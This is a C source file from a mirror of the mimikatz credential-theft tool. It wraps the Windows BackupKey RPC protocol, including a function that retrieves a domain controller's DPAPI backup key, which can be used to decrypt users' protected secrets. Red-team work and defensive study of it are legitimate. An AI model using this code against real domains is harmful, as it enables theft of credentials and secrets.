mirror of
https://github.com/gentilkiwi/mimikatz
synced 2024-12-13 17:45:13 +00:00
1722002956
[new] rpc::connect support /null NTLM session for protseq ncacn_ip_tcp
65 lines
2.3 KiB
C
65 lines
2.3 KiB
C
/* Benjamin DELPY `gentilkiwi`
|
|
http://blog.gentilkiwi.com
|
|
benjamin@gentilkiwi.com
|
|
Licence : https://creativecommons.org/licenses/by/4.0/
|
|
*/
|
|
#include "kull_m_rpc_bkrp.h"
|
|
|
|
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
|
|
{
|
|
BOOL status = FALSE;
|
|
LPWSTR szTmpDc = NULL;
|
|
if(!NetworkAddr)
|
|
if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc))
|
|
NetworkAddr = szTmpDc;
|
|
if(NetworkAddr)
|
|
status = kull_m_rpc_createBinding(NULL, L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
|
|
if(szTmpDc)
|
|
LocalFree(szTmpDc);
|
|
return status;
|
|
}
|
|
|
|
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
|
|
{
|
|
BOOL status = FALSE;
|
|
RPC_BINDING_HANDLE hBinding;
|
|
NET_API_STATUS netStatus;
|
|
PBYTE out = NULL;
|
|
*pDataOut = NULL;
|
|
*pdwDataOut = 0;
|
|
if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
|
|
{
|
|
RpcTryExcept
|
|
{
|
|
netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
|
|
if(status = (netStatus == 0))
|
|
{
|
|
if(*pDataOut = LocalAlloc(LPTR, *pdwDataOut))
|
|
RtlCopyMemory(*pDataOut, out, *pdwDataOut);
|
|
MIDL_user_free(out);
|
|
}
|
|
else PRINT_ERROR(L"BackuprKey: 0x%08x (%u)\n", netStatus, netStatus);
|
|
}
|
|
RpcExcept(RPC_EXCEPTION)
|
|
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
|
RpcEndExcept
|
|
kull_m_rpc_deleteBinding(&hBinding);
|
|
}
|
|
return status;
|
|
}
|
|
|
|
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
|
|
{
|
|
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RESTORE_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
|
|
}
|
|
|
|
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
|
|
{
|
|
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_BACKUP_GUID, DataIn, dwDataIn, pDataOut, pdwDataOut);
|
|
}
|
|
|
|
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
|
|
{
|
|
BYTE dataIn = 'k';
|
|
return kull_m_rpc_bkrp_generic(NetworkAddr, &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, &dataIn, 0, pDataOut, pdwDataOut);
|
|
} |